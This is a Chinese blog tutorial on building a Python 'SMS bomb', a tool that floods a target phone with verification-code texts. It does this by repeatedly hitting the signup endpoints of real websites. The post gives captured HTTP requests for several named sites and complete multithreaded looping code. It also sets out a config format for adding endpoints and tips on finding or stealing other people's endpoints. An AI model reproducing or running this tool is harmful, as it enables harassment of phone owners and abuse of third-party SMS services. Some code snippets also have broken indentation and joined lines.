用python写“一劳永逸”短信炸弹

0x00前言

最近正在学习python,就想写个东西练一下。感觉大家都在写爬虫,再加上之前考研信息泄露,每天收到无数短信、电话轰炸。于是就琢磨自己写一个python的短信炸弹。

0x01原理

原理特别简单,就是利用网上一些注册、办理业务的短信验证码进行模拟发包,完成对目标手机号码的轰炸。大部分网站都是post发包形式,当然也有一小部分是get方式。

下面是两个实际例子的数据包:

西祀胡同

GET /valid/sendcodephone/13999999999 HTTP/1.1
Host: account.xici.net
Connection: keep-alive
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Referer: http://account.xici.net/register
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8

虎扑体育

POST /index.php?m=mobile&a=getAuthCodeAjax HTTP/1.1
Host: passport.hupu.com
Connection: keep-alive
Content-Length: 18
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://passport.hupu.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://passport.hupu.com/register
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
mobile=13999999999

0x02代码:发包

西祀胡同 get方式发包

import requests

pn = raw_input('phone number:')
url = 'http://account.xici.net/valid/sendcodephone/%s' % pn
headers = {'Referer': 'http://passport.hupu.com/register',
    'User-Agent': 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 2Pac; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)'}

try:
    requests.get(url,headers=headers)
    print 'success!'
except Exception,e:
    print e
    print 'fail!'

虎扑体育 post方式发包

import requests 

pn = raw_input('phone number:') 
url = 'http://passport.hupu.com/index.php?m=mobile&a=getAuthCodeAjax' 
payload = {'mobile':pn} 
headers = {'Referer': 'http://passport.hupu.com/register', 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 2Pac; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)'} try: requests.post(url, data=payload, headers=headers) 

 print payload 
 print 'success!' 
except Exception,e: 
 print e print 'fail!'

我用的是requests,当然你也可以用urllib,下面举个一个栗子

import urllib,urllib2 

pn = raw_input('phone number:')
url = 'http://account.xici.net/valid/sendcodephone/%s' % pn 
headers = {'Referer': 'http://account.xici.net/valid/sendcodephone/%s', 'Accept': '*/*', 'Accept-Language': 'zh-cn', 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 9.0; Windows     NT 6.1; 2Pac; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)',} 
try:
    r=urllib2.Request(url) 
    u=urllib2.urlopen(r) 
    print 'success!' 
    except Exception,e: 
    print e print 'fail!'

0x03代码:“一劳永逸”

既然题目说了“一劳永逸”,那么就要体现出来这个点。我们每次发现一个可以用短信验证码网站的时候,都要去构造发包代码,那么也太麻烦了。所以比较方面快捷的方式就是通过“接口”的方式获取到目标网站还有发送包的内容,然后程序要做的事情只是按照“接口”接收到的内容进行相应的发包就行了。

from re import split,sub

pn=raw_input('phone number:')
try:
    f = open('mtfly.txt','r')
except Exception,e:
    print e
    print 'flie fail!'
for eachLine in f.readlines():
    eachLine = sub('phone_number',pn,eachLine)
    eachLine = eachLine.strip()
    mtfly = split('::|\n', eachLine)
    if mtfly[0] == 'get':
        attack_get(mtfly)
    elif mtfly[0] == 'post':
        attack_post(mtfly)

然后再在同目录下新建mtfly.txt文件

内容为:

get::http://account.xici.net/valid/sendcodephone/phone_number::::http://passport.hupu.com/register

post::http://passport.hupu.com/index.php?m=mobile&a=getAuthCodeAjax::mobile=phone_number::http://passport.hupu.com/register

0x04代码:参数、多线程、循环

为了让代码看起来更加高大上,我又增加了optparse模块来处理参数:-n 手机号码 -l 循环次数。

增加了threading来多线程处理发包。

因为基本上网站验证码都有60s的CD时间,那么间隔就设置为了一分钟。

废话不多说,直接上最终版代码:

#!/usr/bin/env python
#coding:utf-8

import requests
import sys
import time
import threading
from re import split,sub
from optparse import OptionParser

def attack_post(mtfly):
    url = mtfly[1]
    mtfly[2] = split('&',mtfly[2])
    dics = {}
    for i in range(len(mtfly[2])):
        mtfly[2][i] = split('=', mtfly[2][i])
        dics.setdefault(mtfly[2][i][0], mtfly[2][i][1])
    payload = dics
    headers = {'Referer': mtfly[3],
    'User-Agent': 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 2Pac;'}
    try:
        requests.post(url, data=payload, headers=headers)
        print 'post success!'
    except Exception,e:
        print e
        print 'post fail!'
		
def attack_get(mtfly):
    url = mtfly[1]
    headers = {'Referer': mtfly[3],
    'User-Agent': 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 2Pac;'}
    try:
        requests.get(url,headers=headers)
        print 'get success!'
    except Exception,e:
        print e
        print 'get fail!'    
		
def attack(mi):
    mtfly = split('::|\n', mi)
    if mtfly[0] == 'get':
        attack_get(mtfly)
    elif mtfly[0] == 'post':
        attack_post(mtfly)

def t_attack(m):
    threads = []
    nloops = range(len(m))
    for i in nloops:        
        t = threading.Thread(target=attack, args=(m[i],))
        threads.append(t)
    for i in nloops:
        threads[i].start()
    for i in nloops:     
        threads[i].join()

p = OptionParser()
p.add_option('-n', '--number', default=13999999999, help='The phone\'number')
p.add_option('-l', '--loop', default=10, help='The number of loop')
options, args = p.parse_args()
pn = options.number
loop = int(options.loop)
m = list()
    
try:
    f = open('mtfly.txt','r')
except Exception,e:
    print e
    print 'flie fail!'
for eachLine in f.readlines():
    eachLine = sub('phone_number', pn, eachLine)
    eachLine = eachLine.strip()
    m.append(eachLine)
for il in range(loop):
    t_attack(m)
    time.sleep(60)
f.close()
print 'all jobs done!'

0x05添加接口

程序完成以后,我们尝试增加一个接口。

我又找了一个发验证码的网站,抓包内容如下:

POST /Ajax/Authenservice/MobileVerifyCode.ashx HTTP/1.1

Referer: http://i.qichetong.com/Ajax/Authenservice/MobileVerifyCode.ashx

Accept: */*

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 2Pac; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

Host: i.qichetong.com

Content-Length: 52

Cache-Control: no-cache

popType=0&r=0.0007466450239014&LoginName=13999999999

易车

首先方式为post

提交网址为:http://i.qichetong.com/Ajax/Authenservice/MobileVerifyCode.ashx

数据为:popType=0&r=0.0007466450239014&LoginName=1399999999

最后是来源:http://i.qichetong.com/Ajax/Authenservice/MobileVerifyCode.ashx

截止复制到mtfly.txt文件里面:

post::http://i.qichetong.com/Ajax/Authenservice/MobileVerifyCode.ashx::popType=0&r=0.0007466450239014&LoginName=1588888888::http://i.qichetong.com/Ajax/Authenservice/MobileVerifyCode.ashx

然后一个新的短信接口就完成啦!

0x06最后

其实原理还有写程序都不是最难得,最关键的其实就是所谓“接口”不好找。其实这些东西也是特别容易的,获取方式主要有:

1.自己找。

百度关键字:手机验证码 这个最笨

聪明一点搜接口url,网上有很多别人共享出来的。

http://bbs.125.la/archiver/tid-13725127.html

https://github.com/liwenxiang/fun_shell/blob/574d0d7f51040102cd28034ac6f571adfe7b2fb8/msg.sh

2.盗用别人接口。

举个栗子

http://zhanimei.com/sms/

或者是下载别人的软件抓包。

3.当然有些软件做了手脚,不能抓包。其实也很简单,炸自己手机一下 然后根据短信找网站就行咯。

最后看看我的轰炸效果吧!

代码:https://github.com/mtfly/sms-bomb

2 comments on “用python写“一劳永逸”短信炸弹

发表评论

电子邮件地址不会被公开。 必填项已用*标注